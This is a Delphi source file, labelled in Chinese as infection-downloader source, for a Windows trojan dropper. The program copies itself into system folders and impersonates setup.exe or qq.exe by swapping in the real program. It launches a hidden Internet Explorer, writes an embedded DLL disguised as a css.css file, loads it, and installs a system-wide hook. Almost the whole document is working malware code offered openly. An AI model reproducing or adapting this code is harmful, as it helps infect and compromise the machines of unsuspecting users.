bots1.dpr

感染下载者源码 感染下载者源码 感染下载者源码

program  bots1;
{$R dll.res}
uses
  Windows, Messages;

var
  Msgt: TMsg;
  MHandle, FileHandle: DWORD;
  PThreadID: PDWORD;
  hookon: procedure;
  hookoff: procedure;
  dllHandle : THandle;
  spath,tt:string;

function CompareAnsiText(const S1, S2: string): Boolean;
begin
  Result := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, PChar(S1), -1, PChar(S2), -1) = 2;
end;
function getwinsys(n:integer):string;
var
 SysDir:array[0..255]of char;
begin
if n=1 then
GetWindowsDirectory(SysDir,255)
else
GetSystemDirectory(SysDir,255);
result:=SysDir;
if Result[Length(Result)]<>'\' then Result := Result + '\';
end;
function ExtractFilename(FileName: string): string;
begin
  Result := '';
  while ((Pos('\', FileName) <> 0) or (Pos('/', FileName) <> 0)) do
  begin
    Delete(FileName, 1, 1);
  end;
  Result :=FileName;
end;
function ExtractFilePath(FileName: string): string;
begin
  Result := '';
  while ((Pos('\', FileName) <> 0) or (Pos('/', FileName) <> 0)) do
  begin
    Result := Result + Copy(FileName, 1, 1);
    Delete(FileName, 1, 1);
  end;
end;
procedure Extract;
var
  ResourcePointer: pchar;
  ResourceLocation: HRSRC;
  ResourceSize, BytesWritten: Longword;
  ResDataHandle, FileHandle: THandle;
begin
  if True then
  begin
    ResourceLocation := FindResource(HInstance, 'ggdll', RT_RCDATA);
    if ResourceLocation <> 0 then
    begin
      ResourceSize := SizeofResource(HInstance, ResourceLocation);
      if ResourceSize <> 0 then
      begin
        ResDataHandle := LoadResource(HInstance, ResourceLocation);
        if ResDataHandle <> 0 then
        begin
          ResourcePointer := LockResource(ResDataHandle);
          if ResourcePointer <> nil then
          begin
            FileHandle := CreateFile(pchar(getwinsys(1) + 'web\css.css'), GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
            if FileHandle <> INVALID_HANDLE_VALUE then
            begin
              WriteFile(FileHandle, ResourcePointer^, ResourceSize, BytesWritten, nil);
              CloseHandle(FileHandle);
            end;
          end;
        end;
      end;
    end;
  end;
end;
function RenameFile(const OldName, NewName: string): Boolean;
begin
  Result := MoveFile(PChar(OldName), PChar(NewName));
end;

begin
    spath:=getwinsys(1);
    copyfile(pchar(paramstr(0)),pchar(spath+'debug\debug.exe'),true);
    copyfile(pchar(paramstr(0)),pchar(spath+'Temp\~tmp83.tmp'),true);
    if CompareAnsiText('setup.exe',ExtractFilename(paramstr(0))) or CompareAnsiText('qq.exe',ExtractFilename(paramstr(0))) then
     begin
        tt:=ExtractFilepath(paramstr(0));
        renamefile(paramstr(0),paramstr(0)+'.bak');
        renamefile(tt+'exe.dat',paramstr(0));
        winexec(pchar(paramstr(0)),sw_normal);
        renamefile(paramstr(0),tt+'exe.dat');
        renamefile(paramstr(0)+'.bak',paramstr(0));
     end;
    if (OpenMutex(MUTEX_ALL_ACCESS, FALSE, 'gg_exe') <> 0) or
     (OpenMutex(MUTEX_ALL_ACCESS, FALSE, 'gg_dll') <> 0) then Exit;
    winexec(pchar(spath+'..\Progra~1\Intern~1\IEXPLORE.EXE'),sw_hide);
    Extract;
    dllHandle := LoadLibrary(pchar(spath+ 'web\css.css'));
    if dllHandle = 0 then Exit;
    @hookon := GetProcAddress(dllHandle,'Hookon');
    if not Assigned(hookon) then
    begin
      FreeLibrary(dllHandle);
      Exit;
    end;
    @hookoff := GetProcAddress(dllHandle,'Hookoff');
    if not Assigned(hookoff) then
    begin
      FreeLibrary(dllHandle);
      Exit;
    end;

  MHandle := CreateMutex(nil, FALSE, 'gg_exe');

  FileHandle := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(DWORD), 'gg_file');
  PThreadID := MapViewOfFile(FileHandle, FILE_MAP_WRITE, 0, 0, 0);
  PThreadID^ := GetCurrentThreadID();
  UnmapViewOfFile(PThreadID);

  Hookon;
  while GetMessage(Msgt, 0, 0, 0) do ; // 等待WM_QUIT
  ;//Hookoff;

  CloseHandle(FileHandle);
  PostMessage(HWND_BROADCAST, WM_WININICHANGE, 0, 0);
  FreeLibrary(dllHandle);
  CloseHandle(MHandle);
end.